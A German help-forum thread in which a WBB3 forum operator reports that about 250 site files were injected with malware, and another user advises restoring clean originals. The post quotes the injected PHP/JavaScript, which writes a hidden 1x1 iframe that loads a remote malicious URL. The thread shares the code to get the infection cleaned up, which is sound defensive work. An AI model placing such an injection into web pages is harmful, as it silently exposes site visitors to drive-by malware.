Hallo Community.

Ich hoffe das ihr mir weiterhelfen könnt, da es sich evtl. nicht direkt um einen Trojaner handelt.
Aber da ich dieses Forum schon seit langem kenne und oft zur Hilfe genutzt habe, musste ich bei folgenden Problem direkt an trojaner-board denken.

Also :

Ich führe ein WBB3 Forum seit Sommer diesen Jahres. Es wurden auch meinerseits ein paar Addons zur Forensoftware hinzugefügt (alle aber von der WBB Seite oder Partnerseiten).
Seit dem 09.12.12 ist das Forum nicht mehr zu benutzen, lediglich der Banner ist zu sehen.

Nun sehe ich auf meinem FTP Server, das fast sämtliche tpl, js und teilweise php Dateien am 09.12.12 um 16:46-16:53 verändert wurden (knapp 250 Dateien, groß geschätzt).

Alle Dateien weisen den gleichen, zusätzlichen Code auf :

Code: Alles auswählenAufklappen

ATTFilter

<? #f524d6# echo " <script type=\"text/javascript\" language=\"javascript\" > (function () { var qfesb = document.createElement('iframe'); qfesb.src = 'hxxp://metra3.sk/counter.php'; qfesb.style.position = 'absolute'; qfesb.style.border = '0'; qfesb.style.height = '1px'; qfesb.style.width = '1px'; qfesb.style.left = '1px'; qfesb.style.top = '1px'; if (!document.getElementById('qfesb')) { document.write('<div id=\'qfesb\'></div>'); document.getElementById('qfesb').appendChild(qfesb); }})();</script>"; #/f524d6# ?>
         

Laut dieser Seite ist das Forum mit Malware infiziert : hxxp://sitecheck.sucuri.net/results/www.soldiersandlegions.de/

Meine Seite : www.soldiersand//legions.de (ohne //)
ICH BITTE MEIN FORUM NUR MIT VORSICHT AUFZURUFEN, DA ICH NICHT WEISS WAS DIE MALWARE MACHT !!!

Nun erhoffe ich mir hier Hilfe, da sämtliche Beiträge verloren wären ... letztes Backup liegt 2 Monate zurück

Da die Dateien alle durch ein vermutliches Script verändert wurden, kann man dies dann mit einem weiteren Script nicht rückgängig machen ?

Wäre super hier Hilfe zu finden, oder evtl Empfehlungen, wo man mir helfen kann.

Gruß, northshore81

Wo liegt jetzt dein Problem?
Die Daten (Inhalte = Beiträge) des Forums liegen doch in keinen tpl, js oder php-Dateien, sondern in der MySQL-DB.

Gibt es eine Möglichkeit, die Dateien mittels eines Scriptes in den ursprünglichen Zustand zu versetzen, oder muss ich die alle komplett neu aufspielen.
Dann müsste ich auch sämtliche Addons mit ACP Einstellungen neu installieren

Zitat:

Zitat von northshore81

Gibt es eine Möglichkeit, die Dateien mittels eines Scriptes in den ursprünglichen Zustand zu versetzen,

Nein.
Woher soll ein Script wissen, wie die Dateien vorher ausgesehen haben?

Es ist zwar möglich einen bestimmten Ausdruck per Script zu entfernen, aber wer sagt, dass es dann tatsächlich "wie vorher" aussieht?
Eben. Niemand!
Irgendjemand hat oder hatte Zugriff, kann alles geändert haben, kann noch mehr, kann weiteres geändert haben, hinzugefügt haben. So dreckig wird keine Website gesäubert. Da greifen (eventuell) viele Nutzer zu, es ist nicht nur ein persönlicher, lokaler Computer zum Rumdaddeln.

Sichere den Zugang ab, ersetze lückenlos alle Dateien mit den Originaldateien, aktualisiere das System so weit wie möglich, spiele eventuell gewünschte oder nötige "Add-ons" ein.